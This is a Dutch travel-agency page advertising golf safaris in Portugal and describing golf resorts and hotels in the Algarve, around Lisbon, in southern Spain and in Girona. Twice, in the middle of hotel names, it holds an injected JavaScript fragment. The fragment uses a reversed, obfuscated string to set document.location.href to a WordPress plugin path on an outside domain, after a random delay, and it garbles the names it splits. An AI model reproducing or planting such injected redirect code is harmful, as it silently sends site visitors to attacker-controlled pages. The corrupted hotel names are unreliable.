Golfsafari Portugal Een golfsafari betekent natuurlijk niet dat we op zoek gaan naar de big five! Tijgers en olifanten treffen we gelukkig niet aan in Portugal. Wel zien we regelmatig wilde zwijnen en herten op de golfbanen. Voor een golfsafari reizen we met onze minibus door Portugal en bezoeken ook de minder bekend regio's.Onze golfprofessionals ter plekke, Anneke en Joop Soonius hebben ruim 27 jaar in Portugal gewoond en gewerkt, kennen het land goed en spreken redelijk Portugees. Betere gidsen en begeleiders kun je niet wensen.
Uw eigen bestemming Ben je met z'n tweeën of met een eigen groep, wij verzorgen de gehele reis, met of zonder begeleiding. We bespreken gezamenlijk in Nederland een fijn programma, overnachtingen, golf, lessen, vervoer enz. Heb je zelf wat te vieren, wil je iets bijzonders cadeau geven, jubileum enz., wij verzorgen het gehele programma. Zakelijk een prettig en nuttig cadeau, het standaard horloge hebben we wel gehad. Het kan dus een complete reis zijn maar bijvoorbeeld ook een leuke golfclinic of een dagje ergens golfen. Maak gebruik van onze expertise !
Met z'n tweetjes een fijne vakantie gebruiken voor de combinatie strand, cultuur en golf leren, Portugal is dan de beste plaats om dit te realiseren. In de Algarve hebben we 3500 zonuren per jaar, prachtige locaties, spectaculaire golfbanen en het belangrijkste: Nederlandse golfprofessionals ter plekke.
Orizonte Lisbon Golf biedt u de kans om ten zuiden van Lissabon 5 fantastische golfbanen te spelen in de Costa Azul region op slechts 10 minuten van het centrum van de stad. Quinta do Peru was al verschillende malen de baan waar de Challenge Tour de wedstrijden heeft gehouden. De 2 banen van Aroeira zijn aangelegd door de zeer bekende golfbaaan architekten Frank Penninck en Donald Steel en Ribagolfe ligt gelegen in een prachtig en zeer oud kurk-eikenbos.
El Rompitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do Golf&Beach Resort
Het Precise Resort El Rompido-The Hotel ligt op een 36-holes golfbaan met uitzicht op de riviermoerassen van Piedras. Het hotel bevindt zich in een rustige omgeving en heeft een spa en een buitenzwembad.De lichte, mooi ingerichte kamers van dit hotel bevinden zich in prachtige tuinen. De kamers beschikken over een balkon, waarvan vele uitzicht op zee bieden. Iedere kamer beschikt over satelliettelevisie en een minibar.
Het Islantilla Golf Resort is een exclusief complex binnen het golfterrein Islantilla, slechts 800 meter van het strand van Islantilla. Het biedt gratis internet, 4 restaurants, een spa en een seizoensgebonden buitenzwembad. Het Islantilla-golfterrein heeft 27 holes. Er zijn ruim voldoende oefen faciliteiten.
Hotel Aldeia toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dos Capuchos, Lissabon
Onder de rook van Lissabon vinden we Hotel Aldeia dos Capuchos bij het historische dorp Capuchos en uitzicht op het lange zandstrand van Costa de Caparica, een fraai modern 4* hotel.Met eigen executive golfbaan voor onbeperkt gratis golf voor de gasten van Golfreizenanders.
Casa Socavas: een complex met een 4 persoons bungalow en 2 prachtige appartementen, ligt aan de rand van Espiche in de Algarve met prachtig uitzicht over de landerijen .........
AC Hotel Palau de Bellavista by Marriott ligt op 10 minuten lopen van het oude centrum en de kathedraal van Girona. Het beschikt over kamers met een minibar en biedt 24 uur per dag roomservice. De bar en buitenrestaurant op het dakterras bieden een indrukwekkend uitzicht.